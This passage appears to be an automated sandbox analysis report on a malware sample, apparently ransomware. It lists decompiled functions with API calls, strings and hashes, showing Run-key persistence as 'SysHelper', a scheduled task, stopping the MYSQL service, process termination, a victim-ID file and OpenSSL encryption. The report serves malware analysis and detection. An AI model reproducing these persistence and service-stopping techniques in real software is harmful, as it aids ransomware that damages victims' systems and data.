                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                                                                                        • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                                                                                                        • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004123B6
                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SysHelper, xrefs: 004123D6
                                                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                                                                                        • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                                                                                                        • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                                                                                                        • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040DC38
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                                                                                        • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                                                                                                        • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                                                                                        • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                                                                                                        • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                                                                                                          • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                                                                                                          • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                                                                                        • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                                                                                                                        • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 790675137-0
                                                                                                                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                                                                                                        • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                                                        • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                                                                                        • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                                                                                                        • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                                                                                        • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                                                                                                        • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                                                                                        • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                                                                                                                                                        • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                                                                                        • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                                                        • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
